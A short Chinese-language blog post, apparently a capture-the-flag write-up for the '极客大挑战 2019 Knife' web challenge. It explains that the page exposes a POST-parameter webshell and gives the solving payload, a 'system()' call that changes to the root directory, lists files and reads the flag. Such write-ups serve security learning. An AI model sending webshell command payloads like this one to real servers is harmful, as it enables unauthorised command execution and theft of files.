[极客大挑战 2019]Knife 1 发表于 2021-10-31 更新于 2023-01-12 分类于 Web 本文字数: 68 阅读时长 ≈ 1 分钟 看页面提示, 就是个POST提交参数的webshell image-20211031130415463 在源码里可以找到输出结果, 然后就是传统艺能, 到根目录去看看都有啥好玩意儿 image-20211031133142800 flag就在这里了 1Syc=system("cd ../../../../../;ls -la;cat flag"); image-20211031133328805